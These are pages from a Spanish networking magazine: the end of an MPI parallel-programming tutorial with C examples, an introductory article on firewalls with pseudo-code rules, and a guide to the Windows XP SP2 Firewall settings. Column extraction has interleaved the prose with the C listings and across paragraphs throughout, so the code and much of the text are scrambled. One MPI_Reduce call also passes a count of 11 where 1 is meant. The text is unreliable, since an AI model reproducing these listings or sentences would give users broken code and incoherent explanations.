ejemplo del programa que imprime un int main(int argc, char **argv)
saludo por pantalla, hola.c, cuyo listado se {
int nro_procesos, id_proceso, i, nro_terminos;
muestra en la Figura 1. float sum = 0, Gsum;
Lo primero que notamos en el código anterior
es que luego de incluir la biblioteca estándar MPI_Init(&argc, &argv);
de input/output de C, incluimos el archivo MPI_Comm_size(MPI_COMM_WORLD, &nro_procesos);
MPI_Comm_rank(MPI_COMM_WORLD, &id_proceso);

Fig. 1 if(id_proceso == 0)
{
#include <stdio.h> printf("Entrar número de términos en la serie\n");
#include "mpi.h" scanf("%d", &nro_terminos);
}
int main(int argc, char **argv)
{ MPI_Bcast(&nro_terminos, 1, MPI_INT, 0, MPI_COMM_WORLD);
int nro_procesos, id_proceso;
for(i = id_proceso; i < nro_terminos; i += nro_procesos)
MPI_Init(&argc, &argv); {
MPI_Comm_size(MPI_COMM_WORLD, if((nro_terminos - i) % 2)
&nro_procesos); sum += (float) 1 / (nro_terminos - i);
MPI_Comm_rank(MPI_COMM_WORLD, else
&id_proceso); sum -= (float) 1 / (nro_terminos - i);
}
printf("Un saludo desde el proce-
sador %d de un total de %d\n", MPI_Reduce(&sum, &Gsum, 11, MPI_FLOAT, MPI_SUM, 0, MPI_COMM_WORLD);
id_proceso + 1, nro_procesos);
if(id_proceso == 0)
MPI_Finalize(); printf("El logaritmo natural de 2 es %f\n", Gsum);

return 0; MPI_Finalize();
} return 0;
}

|26 - NEX / Revista de Networking y Programación


cada proceso inicializa la variable i
con su rango y la incrementa en #include <stdio.h>
#include <stdlib.h>
una cantidad igual al número de #include "mpi.h"
procesos involucrados. El incre- int main(int argc, char** argv)
mento se detiene cuando se {
alcanza el valor ingresado como int nro_procesos, id_proceso, i, nro_terminos, size;
float *a, *b, sum = 0.0, Gsum;
dato. De esta forma, cada proceso FILE *fp;
efectúa una suma parcial de térmi- MPI_Status status;
nos alternados que en ningún MPI_Init(&argc, &argv);
momento interfiere con las sumas MPI_Comm_rank(MPI_COMM_WORLD, &id_proceso);
MPI_Comm_size(MPI_COMM_WORLD, &nro_procesos);
realizadas por los otros procesos.
Como detalle secundario, digamos if(id_proceso == 0)
{
que las sumas se efectúan en if((fp = fopen("datos.txt", "r")) == NULL)
orden inverso, es decir, comenzan- {
printf("No se puede abrir archivo datos.txt\n");
do por las menores contribuciones MPI_Abort(MPI_COMM_WORLD, -1);
en lugar de por las mayores. De }
fscanf(fp, "%d", &nro_terminos);
esta forma, nos aseguramos una
mayor estabilidad numérica. MPI_Bcast(&nro_terminos, 1, MPI_INT, 0, MPI_COMM_WORLD);
Una vez que cada proceso efectuó if(nro_terminos % nro_procesos)
su correspondiente suma parcial la {
printf("El numero de terminos no es multiplo del numero de procesos.\n");
misma es devuelta o entregada al MPI_Abort(MPI_COMM_WORLD, -1);
proceso de rango 0 que realizará la }
suma final. Esta operación es a = (float *) malloc(nro_terminos * sizeof(float));
llamada all-to-one communication b = (float *) malloc(nro_terminos * sizeof(float));
y es llevada a cabo por la función for(i = 0; i < nro_terminos; i++)
MPI_Reduce. Esta función muestra fscanf(fp,"%f %f", &a[i], &b[i]);
siete parámetros: la dirección de la fclose(fp);
variable que se está transmitiendo for(i = 1, size = nro_terminos / nro_procesos; i < nro_procesos; i++)
desde cada proceso; la dirección de {
la variable que almacenará el resul- MPI_Send(&a[size*i], size, MPI_FLOAT, i, 10, MPI_COMM_WORLD);
MPI_Send(&b[size*i], size, MPI_FLOAT, i, 20, MPI_COMM_WORLD);
tado operado sobre las variables }
recibidas desde cada proceso; el }
else
número de variables que se trans- {
mite; el tipo de cada variable que MPI_Bcast(&nro_terminos, 1, MPI_INT, 0, MPI_COMM_WORLD);
se transmite; el tipo de operación a if(nro_terminos % nro_procesos)
realizar sobre los datos recibidos; el {
printf("El numero de terminos no es multiplo del numero de procesos.\n");
rango del proceso que está reci- MPI_Abort(MPI_COMM_WORLD, -1);
biendo los datos y, finalmente, el }
conjunto de procesos involucrados size = nro_terminos / nro_procesos;
en la tarea. Lo notorio de esta a = (float *) malloc(size * sizeof(float));
función es que por medio de un b = (float *) malloc(size * sizeof(float));
tipo como MPI_SUM indicamos MPI_Recv(&a[0], size, MPI_FLOAT, 0, 10, MPI_COMM_WORLD, &status);
que la variable Gsum será deposi- MPI_Recv(&b[0], size, MPI_FLOAT, 0, 20, MPI_COMM_WORLD, &status);
taria de la suma de las contribu- }
ciones de cada proceso. En otras for(i = 0; i < size; i++)
palabras, no es necesario codificar sum += a[i] * b[i];
un nuevo for conteniendo una sen- MPI_Reduce(&sum, &Gsum, 1, MPI_FLOAT, MPI_SUM, 0, MPI_COMM_WORLD);
tencia como Gsum += sum porque if(id_proceso == 0)
esa operación la realiza automáti- printf("El producto escalar de los vectores a y b vale %f \n",Gsum);
camente la función MPI_Reduce a MPI_Finalize();
través de su argumento MPI_SUM.
El estándar de MPI contiene return 0;
}
muchos tipos que actúan como
MPI_SUM: MPI_PROD, MPI_MAX, Fig. 4
MPI_MIN, etc.

Revista de Networking y Programación / NEX - 27|


Finalmente, el proceso con rango 0 da a parámetros, de los cuales los primeros seis son El producto escalar de los vectores a y
conocer el resultado final de la evaluación de la coincidentes con los de MPI_Send. El séptimo b vale 744.0
serie. La ejecución del programa con 100.000 parámetro, status, es la estructura de tipo
términos da una estimación de 0.693142 para MPI_Status de la que hablamos al comienzo En este pequeño tutorial sobre el método
el logaritmo natural de 2. de este ejemplo. message passing en su versión MPI hemos es-
El último programa que analizaremos tiene Luego del bloque if/else que administra el tudiado, a través de ejemplos sencillos pero
que ver con nuestro ejemplo inicial, el pro- envío y recepción de las porciones de vector, nos ilustrativos, la sintáxis y forma de trabajo de las
ducto escalar de dos vectores. El código, algo topamos con la realización de las sumas parciales siguientes funciones: MPI_Init, MPI_Finalize,
más extenso que los anteriores, se muestra que darán lugar al producto vectorial buscado. MPI_Abort, MPI_Comm_size, MPI_Comm_rank,
en la figura 3. Finalmente, la función MPI_Reduce colecta las MPI_Bcast, MPI_Reduce, MPI_Send y MPI_Recv.
Lo primero que notamos es la presencia de la sumas parciales, las adiciona en la variable Gsum
definición MPI_Status status. MPI_Status y el proceso con rango 0 imprime el resultado.
es una definición de estructura de cuatro ele- Para un archivo datos.txt conteniendo las En las direcciones de internet referenciadas en
mentos, siendo sólo tres los relevantes: un i- líneas mostradas en la figura 4. [5] y [6] se pueden encontrar enlaces a más
dentificador del rango del proceso que trans- La salida esperable con un número par de material de aprendizaje de esta fascinante área
mite; un rótulo asociado al mensaje recibido y procesadores no mayor a 8 es: como es la programación en paralelo.
un código de error.
Vemos luego que el proceso iniciador abre el Fig. 4
archivo datos.txt que contiene la dimensión 8
y los elementos de los vectores. En caso de no 1 2 MPI -Unpocodehistoria:
existir dicho archivo, se produce la salida del 3 4
programa con la función MPI_Abort que co- 5 6
A principios de la década de 1980 versión MPICH y la Ohio State
7 8
munica la decisión al conjunto de procesos por 9 10
varios grupos habían desarrollado University, responsable de LAM/MPI.
medio de un código de error. 11 12 bibliotecas de funciones para desa- Desde 1998 hasta fines de 2002, un
Posteriormente, el proceso iniciador usa la 13 14 rrollo de programas dentro de la nuevo consorcio, formado esta vez
función MPI_Bcast para poner en 15 16 filosofía message passing. PVM, del por casi 120 personas de institu-
conocimiento de todo el conjunto la dimensión Oak Ridge National Laboratory, fue el ciones como Argonne National
de los vectores, la cual es utilizada para reser- último de estos desarrollos. Laboratory, CalTech, Cray, DEC,
Hacia 1992 esos desarrolladores General Electric Company, Hewlett-
varles memoria por medio de la función
tenían en claro que estaban dupli- Packard, Hitachi, Intel, IBM, Los
malloc. Luego de esto, los elementos de los
cando esfuerzos y reinventando la Alamos National Laboratory, NASA,
vectores son leídos desde el archivo de datos. rueda a cada momento. Decidieron Ohio State University, Silicon
Un bucle for es utilizado por el proceso inicia- entonces reorientar sus actividades Graphics Inc., Sun Microsystems, US
dor para repartir porciones de los vectores con el fin de implementar un están- Navy, Edinburgh Parallel Computing
entre el resto de los procesos. Notar que se usa dar para message passing. En mayo Centre y German National Research
la variable size para dividir en partes iguales de 1994 se conoció MPI-1, el primer Center for Information Technology
la dimensión de los vectores entre los procesos. estándar. Trabajaron en él cerca de por nombrar algunos, se involucró en
La función para enviar la porción de vectores a sesenta personas pertenecientes a el desarrollo de MPI-2, el nuevo es-
un proceso en particular desde el proceso casi cuarenta organizaciones, entre tándar que incluye la extensión a
inicia-dor es MPI_Send. Es importante darse las cuales se encontraban Cray, IBM, C++ y Fortran90, creación de proce-
Intel, NEC y por supuesto el Argonne sos durante la ejecución y soporte
cuenta de la diferencia entre esta función y las
National Laboratory que lanzó su propio de input/output.
anteriores, MPI_Bcast y MPI_Reduce. Estas
eran del tipo one-to-all y all-to-one communi-
cation mientras que MPI_Send es del tipo
point-to-point communication ya que enlaza
dos procesos sin involucrar el resto de los que [1] Véase el artículo sobre openMosix y Condor en el número 10 de NEX IT Specialist para una somera descrip-
componen el conjunto. MPI_Send presenta ción de los tipos de clusters que existen en la actualidad.
seis argumentos: la dirección de los datos a [2] How to Write Parallel Programs - A First Course. Nicholas Carriero and David Gelernter. MIT Press (3rd
transmitir; la cantidad de los mismos; el tipo de Printing, 1992). Existe una versión gratuita en http://www.lindaspaces.com/book/index.html.
datos transmitidos; el rango del proceso [3] http://www.csm.ornl.gov/pvm/.
destino; un rótulo identificador y el conjunto [4] http://www-unix.mcs.anl.gov/mpi/index.htm.
[5] http://www-unix.mcs.anl.gov/mpi/mpich.
de procesos involucrados en la tarea.
[6] http://www.lam-mpi.org.
Intimamente relacionada con MPI_Send en- [7] http://www.lindaspaces.com. TCP Linda se ofrece en una versión gratuita para clusters de hasta cuatro
contramos más abajo la función MPI_Recv procesadores para lenguaje C.
que administra la recepción de datos desde un [8] Un listado completo de las más de 200 funciones que componen MPI-2 se puede consultar en
proceso en particular. MPI_Recv tiene siete http://www-unix.mcs.anl.gov/mpi/www/www3.

|28 - NEX / Revista de Networking y Programación


SEGURIDAD

¿Qué es un
No se podría hablar de Internet, redes locales, aplicaciones compartidas y comer-
cio electrónico sin mencionar los firewall. Estos componentes de software, hard-
ware, o combinación de ellos, son fundamentales para proteger la integridad de
la información en una sociedad cada vez más dependiente de las redes de datos.

POR MARCELO C. A. ROMEO


FIREWALL
?
B
ásicamente, un firewall es un pro- rios detrás de un firewall no pueden recibir margen de coincidencia, el material entrante
grama que restringe las conexiones archivos a través de la mensajería instantánea, pasa sin problema;en caso contrario,se descarta.
TCP/IP entrantes y/o salientes de o tampoco pueden acceder a algunos sitios Los filtros de un firewall se definen a partir de
una computadora conectada a la WWW que pueden estar catalogados como dis- ciertos criterios, tales como:
red, dejando circular solamente el tráfico que tribuidores de spyware.
los administradores de la red definan. Hay tres formas de operar los firewalls (se Direcciones IP: Se puede bloquear el acceso
Hay varios tipos de firewalls. Los perimetrales pueden usar una o varias de ellas): desde una IP específica,evitando ataques o con-
(los más clásicos), hacen de puente entre la red sultas masivas a equipos servidores y clientes.
local de una organización e Internet. En estos Filtrado de paquetes: Cada paquete de informa-
casos, el firewall también suele ejercer la ción se analiza con respecto a una serie de filtros. Nombres de dominio: Consiste en tablas con
función de NAT (Network Address Translation), Los paquetes que logran pasar los filtros se nombres de computadoras vinculadas al DNS a
también llamada "enmascaramiento", hacien- envían al sistema que los solicitó y todos los donde no se permite el acceso de los usuarios
do posible que todas las computadoras de la demás se descartan. locales.
red local, salgan a Internet con una misma y
única dirección IP pública. Servicio Proxy: La información solicitada del exte- Palabras clave: Programas detective (sniffer) en
La funcionalidad de un firewall puede ir incluso rior es recuperada por el firewall y después los firewalls revisan el contenido de la informa-
más allá, y realizar modificaciones sobre las co- enviada al sistema que la requirió originalmente. ción en búsqueda de palabras vinculadas con
municaciones. Se lo puede configurar como un Inspección estática: No se examinan los paquetes información o sitios no permitidos.
NAT (Network Address Translation), enmas- de la información, pero se comparan ciertas Puertos: Cada aplicación o servicio que usa la red
carando las IPs de las máquinas locales para partes clave de cada paquete en búsqueda de IP, genera una conexión hacia un puerto. El 80 es
que salgan al exterior con una única IP pública. datos confiables. Los datos que salen de la red el común para los servidores WWW y el 21 para
Los firewalls pueden contener reglas para el local se analizan registrando patrones específi- las transferencias de archivos (FTP). Un firewall
acceso a servicios WWW, FTP o de mensajería cos, de manera tal que la información entrante registra estos servicios, qué computadoras
instantánea, entre otros. Por ello, muchos usua- debe cumplir con esos patrones. Si hay un cierto pueden acceder a ellos y cuáles no.

fig. 1

Foto: © 2005 Hemera Technologies Inc. Revista de Networking y Programación / NEX - 31|
fig. 2

WWW) o Telnet (para sesiones remotas).Así se evita que usuarios mal inten- el resto de la red local sigue protegida por el firewall.Esta estructura de DMZ
cionados del exterior de la red,intenten acceder a un equipo local mediante puede hacerse también con un doble firewall (Fig.3).
un protocolo específico. Los firewalls se pueden usar en cualquier red. Es habitual tenerlos
Para un administrador de firewall es mucho más sencillo aplicar el filtrado como protección de Internet en las empresas, aunque ahí también
por puertos o protocolos que los anteriores, dado que los otros métodos suelen tener una doble función: controlar los accesos externos hacia
(IPs,nombres de dominio y palabras clave) requieren de más vigilancia y ad- adentro y también los internos hacia el exterior; esto último se hace
ministración del firewall, aunque ningún método excluye a los demás de con el firewall o frecuentemente con un proxy (que también utilizan
poder ser utilizados. reglas, aunque de más alto nivel).
Ahora bien, para que un firewall entre redes funcione como tal debe tener También en empresas de hosting con muchos servidores, lo normal es
al menos dos placas de red.Podemos apreciar la tipología clásica de un fire- encontrarnos con uno o más firewalls ya sea filtrando toda la insta-
wall en la Fig.1. lación o parte de ella.
Dependiendo de las necesidades de cada red, puede ponerse uno o más Sea el tipo de firewall que sea,generalmente no tendrá más que un conjun-
firewalls para establecer distintos perímetros de seguridad en torno a un to de reglas en las que se examina el origen y destino de los paquetes del
sistema. Es frecuente también que se necesite exponer algún servidor a protocolo TCP/IP. En cuanto a protocolos, es probable que sean capaces de
Internet,como es el caso de un IIS,un Apache o un Exchange Server,en cuyo filtrar muchos tipos de ellos, no sólo los TCP, sino también los UDP, ICMP, GRE
caso obviamente es necesario permitir cualquier tipo de conexión a ellos.Lo y otros protocolos vinculados a VPNs. Este podría ser (en pseudo-lenguaje)
que se recomienda entonces, es situar dichos servidores en lo que se de- un conjunto de reglas de un firewall del primer gráfico:
nomina una DMZ o zona desmilitarizada. Es estos casos, el firewall debe
tener tres placas de red (Fig.2). Todo lo que venga de la red local al firewall = ACEPTAR.
En la zona desmilitarizada o DMZ se pueden poner tantos servidores como Todo lo que venga de la IP de mi casa al puerto TCP 22 = ACEPTAR
sean necesarios.Con esta arquitectura,permitimos que el servidor sea acce- Todo lo que venga de la IP de la casa del jefe al puerto TCP 1723 = ACEPTAR
sible desde Internet de forma tal que si es atacado y cae bajo dominio ajeno, Todo lo que venga de la red local y vaya al exterior = ENMASCARAR

fig. 3

|32 - NEX / Revista de Networking y Programación


Todo lo que venga del exterior al puerto TCP 1 al 1024 = DENEGAR
Todo lo que venga del exterior al puerto TCP 3389 = DENEGAR
Todo lo que venga del exterior al puerto UDP 1 al 1024 = DENEGAR
En definitiva,lo que esto hace es:
-Habilita el acceso a puertos de administración a determinadas IPs privilegiadas.
-Enmascara el tráfico de la red local hacia el exterior (NAT,una petición de una PC
de la red local sale al exterior con una IP pública),para poder salir a Internet.
-Restringe el acceso desde el exterior a puertos de administración y a todo lo que
esté entre 1 y 1024.

Hay dos maneras de implementar un firewall:


1) Política por defecto: ACPETAR.En principio, todo lo que entra y sale por el
firewall se acepta y sólo se denegará lo que se le pida explícitamente.
2) Política por defecto: DENEGAR. Todo está denegado, y sólo se permitirá
pasar por el firewall aquello que se le pida explícitamente.
Como es obvio imaginar,la primera política facilita mucho la administración
del firewall, ya que simplemente nos tenemos que preocupar de proteger
aquellos puertos o direcciones que sabemos que nos interesan; el resto no
importa tanto y se deja pasar. Por ejemplo, si queremos proteger una

máquina Linux,podemos usar el comando netstat


para saber qué puertos están abiertos, fijar reglas
para esos puertos y listo.¿Para qué vamos a prote-
ger un puerto que nunca se abre?
Lo que puede pasar es que no controlemos qué es
lo que está abierto,o que en un momento dado la
instalación de un software abra un puerto deter-
minado,o que no sepamos que determinados pa-
quetes ICMP son peligrosos. Si la política por
defecto es ACEPTAR y no se protege explícita-
mente, podemos poner en riesgo la PC o el servi-
dor que queremos proteger.
En cambio,si la política por defecto es DENEGAR,a
no ser que lo permitamos explícitamente, el fire-
wall se convierte en un auténtico MURO infran-
queable. El problema es que es mucho más difícil
preparar un firewall así, hay que tener muy en
claro cómo funciona el sistema y qué es lo que se
tiene que abrir sin caer en la tentación de imple-
mentar reglas súper-permisivas. Así y todo, esta
configuración de firewall es la recomendada,
aunque no es aconsejable usarla si no se domina
mínimamente el sistema.

Importante: El orden en que se ponen las reglas


del firewall es determinante. Normalmente,
cuando hay que decidir qué se hace con un
paquete, se va comparando con cada regla del
firewall hasta que se encuentra una que le afecta
(match),y se hace lo que dicha regla dicte (aceptar
o denegar); después de eso, NO SE TENDRAN EN
CUENTA MAS REGLAS para ese paquete. ¿Cuál es
el peligro? Si ponemos reglas muy permisivas
entre las primeras del firewall, puede que las si-
guientes no se apliquen y no sirvan de nada.

Revista de Networking y Programación / NEX - 33|


MICROSOFT

Windows
FIREWALL
Con el Ser vice Pack 2 de Microsoft, el nuevo PorMarceloC.A.Romeo
Windows Firewall reemplaza al viejo y básico
Internet Connection Firewall que Windows XP
traíaincorporadoensusprimerasversiones.

Windows XP Service Pack 2 -Nuevas opciones de configu- da acceso al Windows Firewall


(SP2), trae incorporado un nuevo ración con Netsh y Group Policy. Control Applet, también disponible
firewall que reemplaza al viejo En este artículo haremos una des- desde el Panel de Control bajo la
Internet Connection Firewall (ICF) cripción detallada del conjunto de categoría "Network and Internet
que venía incluido con Windows cuadros de diálogo que apare- Connections and Security Center".
XP en sus primeras versiones. cerán al configurar manualmente El cuadro de diálogo del nuevo
Windows Firewall está total- el nuevo Windows Firewall.A difer- Windows Firewall contiene las
mente integrado al sistema ope- encia del ICF de Windows XP SP1 o siguientes solapas (tabs): General,
rativo, y bloquea de forma au- del Windows XP sin SP instalado, Exceptions y Advanced.
tomática el tráfico de paquetes estos cuadros de diálogo contem-
entrantes no solicitados. Esto plan la configuración tanto del GeneralTab
ofrece un nivel de seguridad muy tráfico IPv4 como del IPv6.
eficiente contra ataques externos Las opciones de configuración del La configuración por default de
por parte de hackers, impidiendo ICF (versiones Windows XP previas esta solapa está representada en
del mismo modo la ejecución (sin al SP2), consistían tan sólo de un la Fig.1.Vamos a las opciones:
nuestro consentimiento) de checkbox ("Protect my computer - On (recommended): habilita
código maligno proveniente de and network by limiting or pre- Windows Firewall en todas las
innumerables páginas existentes venting access to this computer conexiones de red que se encuen-
hoy día en Internet. from the Internet") en la solapa tren seleccionadas en la solapa
Algunas de las características más "Advanced" en el cuadro de diálogo "Advanced". De esta manera,
destacadas de este nuevo firewall de propiedades de una conexión Windows Firewall queda configu-
del Windows XP SP2, son: de red, y el botón "Settings" desde rado para permitir solamente el
-El firewall queda habilitado por el cual se podía especificar el tráfico tráfico entrante solicitado y aquel
default sobre todas las placas de excluido, los archivos de log y el que se encuentre excluido. Este
red que tenga el equipo. tráfico ICMP permitido. trafico excluido podremos especi-
-Nuevas opciones de configu- En Windows XP SP2, el checkbox ficarlo en la solapa "Exceptions".
ración global para todas las de la solapa "Advanced" del cuadro - Don't Allow Exceptions: con este
conexiones del equipo. de diálogo en propiedades de una checkbox seleccionado, sólo
-Nuevo "modus operandi". conexión de red, ha sido reem- estaremos permitiendo el ingreso
-Especificación de rango de plazado con un botón "Settings" de paquetes entrantes que hayan
tráfico excluido. desde el cual realizaremos configu- sido previamente solicitados, igno-
-Posibilidad de especificar el raciones generales, excepciones rando todo el tráfico excluido que
tráfico excluido por nombre para programas y servicios, config- se encuentre especificado en la
de aplicación. uraciones de conexión específicas, solapa "Exceptions".
-Soporte integrado para tráfico por archivos de log y tráfico ICMP per- - Off (not recommended): Esto des-
Internet Protocol versión 6 (IPv6). mitido. Este botón "Settings" nos habilita totalmente las funciones

|34 - NEX / Revista de Networking y Programación


del Windows Firewall. Obviamente este motivo, para poder así especi-
no es lo recomendado,a menos que ficarlos en la solapa "Exceptions".
estemos usando o deseemos usar Varias aplicaciones, como navega-
alguna otra aplicación de Firewall. dores (Internet Explorer, Netscape
Desde ya, la opción por default de Navigator, Mozilla Firefox, etc.) y
Windows Firewall es On (recom- clientes de email (Outlook,Outlook
mended) para todas conexiones de Express, Opera, etc.) funcionan co-
red del equipo. Pero que esta rrectamente con Windows Firewall
opción se encuentre seleccionada habilitado sin necesidad de tener
por default, puede influir negativa- que especificarlos en "Exceptions".
mente en la comunicación entre Si estamos haciendo uso de
aplicaciones y/o servicios que Políticas de Grupo (Group Policy) Fig. 2
tenemos instalados, y que requie- para configurar Windows Firewall
ran tráfico entrante de paquetes no en computadoras cliente que usuario.De esta forma,las opciones actualmente logueados, usaremos
solicitados. Es en este caso que se corren Windows XP con SP2, es im- de la solapa "General" y otras más, los comandos netsh firewall show.
hace necesario identificar cuáles portante que dichas políticas aparecerán grisadas (deshabili- Y si además de ver queremos rea-
son esas aplicaciones y/o servicios impidan la configuración local del tadas para realizar cambios), lizar cambios, usaremos los co-
que han dejado de funcionar por Windows Firewall por parte del incluso si el usuario se loguea con mandos netsh firewall set.
Fig. 1 una cuenta miembro del grupo de
administradores locales. ExceptionsTab
Los seteos de Windows Firewall
bajo Group Policy, permiten con- La Fig.2 nos ilustra la configu-
figurar un Domain Profile (Perfil ración por default de la solapa
de Dominio, obviamente para "Exceptions".
aquellos casos en que la red Desde aquí es donde podemos ha-
cuente con la presencia de un bilitar o deshabilitar aplicaciones
Domain Controller) y un Standard y/o servicios y puertos. Pero
Profile (en caso de no contar con recordemos (como ya men-
un Domain Controller). A través cionamos anteriormente) que
del texto que aparece en la parte todo lo especificado en este
inferior de la solapa "General", cuadro de diálogo no tendrá
podemos determinar cual es el validez si el checkbox de "Don't
perfil activo. Si el texto dice allow exceptions" se encuentra
"Windows Firewall is using your tildado en la solapa "General".
domains settings", el Domain Con las versiones previas de
Profile (o Perfil de Dominio es el Windows XP (anteriores al SP2),
que está activo). Si en cambio el sólo era posible especificar el
texto indica "Windows Firewall is tráfico excluido a través de los
using your non-domain settings", puertos TCP y/o UDP. Con
entonces es el Standard Profile Windows XP SP2, podemos
quien se encuentra activo. hacerlo así o bien usando directa-
Los cuadros de diálogo de config- mente el nombre de la aplicación
uración, sólo muestran los seteos y/o servicio. Esta flexibilidad en la
del Windows Firewall del perfil forma de configurar Windows
actual. Para poder ver los seteos Firewall, facilita mucho las cosas,
de otro perfil al que no estamos sobre todo cuando no sabemos

Revista de Networking y Programación / NEX - 35|


Fig. 4

cuales son los puertos que está "Change Scope" (Fig.5).


usando una aplicación específica Se nos presentan tres opciones
que queremos excluir, o en aque- para definir el rango para un pro-
llos casos donde la aplicación grama o puerto:
decide dinámicamente al iniciarse - Any computer (including those
los puertos que utilizará. on the Internet).El tráfico excluido
Hay una serie exclusiones pre- es permitido para cualquier direc-
definidas, que incluyen: ción IPv4 o IPv6. Atención, porque
- File and Print Sharing esta opción podría poner en
- Remote Assistance (se ecuentra riesgo su equipo, volviéndolo vul-
habilitada por default) nerable a los ataques externos por
- Remote Desktop parte de usuarios o la ejecución de
- UPnP framework código maligno desde Intenet.
Estas opciones predefinidas - My network (subset) only. El
pueden ser deshabilitadas, pero tráfico excluido es permitido para
nunca eliminadas. cualquier dirección IPv4 o IPv6
Si la Group Policy así lo permite, que sea directamente ruteable
podemos crear exclusiones adi- desde nuestro equipo. Windows
cionales especificando el nombre Firewall determina si un paquete
de la aplicación a través del botón proviene de un equipo directa-
"Add Program", o bien especifi- mente ruteable analizando las
cando un puerto TCP o UDP por tablas de ruteo IPv4 y IPv6. Es por
medio del botón "Add Port". ello que el rango de direcciones
Fig. 3
Al hacer click sobre "Add consideradas como ruteables, de-
Program", aparece un cuadro de penderán del contenido de las
diálogo que nos permitirá elegir tablas de ruteo IPv4 y IPv6. Una
La misma tecnología presente en el
motor del Windows Firewall del un programa de una lista específi- forma de saber cuales son las di-
Service Pack 2 de Microsoft Windows ca, o hacer un "Browse" para bus- recciones IP directamente rutea-
XP, ha sido incorporada al reciente carlo en nuestro equipo (Fig.3). bles, podemos usar el comando
lanzamiento oficial del Service Pack 1 Si en cambio hacemos clic sobre el route print desde una pantalla de
para Microsoft Windows Server 2003. botón "Add Port", aparece el DOS (Command Prompt).
Por medio del uso de nuevas Group cuadro de diálogo que nos permi- - Custom list. Podemos especificar
Policies, el profesional IT puede cen- tirá configurar un puerto TCP o una o más direcciones IPv4, o un
tralizar la instalación, configuración y UDP (Fig.4). rango de direcciones IPv4 sepa-
manejo del Windows Firewall a nivel
El nuevo Windows Firewall, nos da radas por comas. Por lo general,
cliente-servidor, incluyendo la apli-
cación de reglas para aplicaciones y también la posibilidad especificar los rangos de direcciones IPv4 co-
puertos, y archivos de log. un rango (scope) de direcciones IP rresponden a una subred local. Un
para tráfico excluido. Este rango ejemplo podría ser el siguiente:
Además,Windows Firewall provee lo que se denomina "boot-time protec- define la porción o segmento de la 10.91.12.56,10.7.14.9/255.255.25
tion", lo que reduce el riesgo de sufrir ataques durante los delicados y vul- red desde la cual se permitirá el 5.0,10.116.45.0/255.255.255.0,17
nerables procesos de re-inicio y apagado del servidor. ingreso de paquetes entrantes no 2.16.31.11/24,172.16.111.0/24
solicitados. Para eso está el botón Pero no es posible especificar algo

|36 - NEX / Revista de Networking y Programación


Fig. 5

por el estilo con direcciones IPv6. NetworkConnections


Antes de habilitar cualquier tipo Settings
de exclusión, debemos estar com-
pletamente seguros de que nece- Esto nos permitirá:
sitamos hacerlo. Tengamos en - Especificar mediante checkbox-
cuenta que cada exclusión habili- es, las placas de red par alas cuales
tada expone nuestra computado- Windows Firewall estará activo.
ra a eventuales ataques externos. Por default, todas las placas de red
No hay forma de garantizar la se- del equipo se encuentran habili-
guridad una vez que una ex- tadas. Fig. 6
clusión ha sido habilitada. - Configurar opciones avanzadas
Cuando configuramos y habilita- para una conexión en particular, ha-
mos una exclusión, le estamos pi- ciendo click en el botón "Settings".
diendo a Windows Firewall que Si dejamos todos los checkboxes
permita el ingreso de paquetes de las placas de red sin tildar, Fig. 7
entrantes no solicitados que Windows Firewall quedará au-
hayan sido enviados desde el tomáticamente deshabilitado, sin
rango de direcciones IP especifi- importar si habíamos elegido pre-
cadas. Y si encima dichas IPs son viamente la opción On (recom-
públicas, la única forma posible de mended) de la solapa "General".
prevenir ataques externos es des- Del mismo modo, los seteos que
habilitar la exclusión. hayamos hecho en "Network
Una vez agregada una aplicación Connections Settings" serán com-
o puerto, se encontrarán deshabi- pletamente ignorados si selec-
litados por default.Y todas las apli- cionamos la opción Don't allow
caciones y/o servicios habilitados exceptions de la solapa "General",
desde la solapa "Exceptions" en cuyo caso todas las conexiones
estarán habilitados para todas las (placas de red) estarán protegidas.
conexiones de red que se encuen- Al hacer click en "Settings", se
tren seleccionadas en la solapa abre el cuadro de diálogo que se
"Advanced". muestra en la Fig.7
Desde aquí, podremos configurar
AdvancedTab servicios específicos de la solapa
"Services" (sólo por puerto TCP o
La Fig.6 nos muestra la solapa UDP), o también habilitar algún
"Advanced". Esta solapa nos pre- tipo específico de tráfico ICMP de
senta las siguientes secciones: la solapa "ICMP".

- Network Connections Settings SecurityLogging


- Security Logging
- ICMP Haciendo click en "Settings", se
- Default Settings abre el cuadro de diálogo Log

|38 - NEX / Revista de Networking y Programación


Settings (Fig.8). Desde aquí po- intercambio de paquetes entre clusiones en forma automática.
dremos decidir si el archivo de Log una máquina y otra. Cuando Cuando una aplicación que se está
guardará la información corres- hacemos un ping, estamos envian- ejecutando sin usar el API de
pondiente a los paquetes rechaza- do un paquete ICMP del tipo Echo Windows Firewall, intenta abrir
dos o a aquellos aceptados, como message, y obtenemos como res- puertos TCP o UDP, Windows
así también especificar el nombre puesta un paquete ICMP del tipo Firewall avisa al administrador local
del archivo de Log, la ubicación Echo reply. Por default, Windows a través de una pantalla denomina-
donde se guardará y su tamaño Firewall no permite la entrada de da Windows Security Alert (Fig.10)
máximo en KB. paquetes Echo messages, por lo El administrador local puede en-
que nuestra computadora se verá tonces optar por alguna de estas
ICMP también impedida de enviar pa- tres opciones:
quetes Echo reply… a menos que - Keep Blocking: agrega la apli-
Con un click en "Settings" podremos habilitemos la opción Allow in- cación a la lista de exclusiones,
especificar el tipo de paquetes ICMP coming echo request. pero con el checkbox deshabilita-
que serán permitidos, a través del do, con lo cual los puertos requeri-
cuadro de diálogo de la Fig.9. DefaultSettings dos por la aplicación no son abier-
Aquí podremos habilitar o desha- tos. El tráfico de paquetes en-
bilitar los tipos de mensajes ICMP Click en "Restore Defaults" para trantes no solicitados queda blo-
que Windows Firewall permite configurar Windows Firewall con queado, a menos que el admi-
para todas las conexiones selec- las opciones de protección por nistrador especifique lo contrario
cionadas en la solapa "Advanced". default. Por supuesto que antes de a través de la solapa "Exceptions".
Los mensajes ICMP se usan gene- hacerlo, nos pedirá confirmación Aún así, Windows Firewall agrega
ralmente para diagnóstico, mediante una pantalla de alerta. la aplicación a la lista de exclu-
reporte de errores y configuración, siones para no volver a alertar al
etc. Por default, ningún tipo de WindowsFirewall administrador toda vez que ésta
mensaje ICMP que aparece en la Notifications es ejecutada.
lista está habilitado. - Unblock: agrega la aplicación a
Algo usado en forma muy fre- Las aplicaciones que corramos la lista de exclusiones, pero en
cuente cuando hay problemas de pueden usar el API (Application modo habilitado, de forma tal que
conectividad en un equipo es el Programming Interface) de los puertos requeridos por la apli-
comando Ping, para chequear el Windows Firewall para agregar ex- cación quedan abiertos.

Fig. 8

Fig. 9

Revista de Networking y Programación / NEX - 39|


- Ask Me Later: bloquea el tráfico de
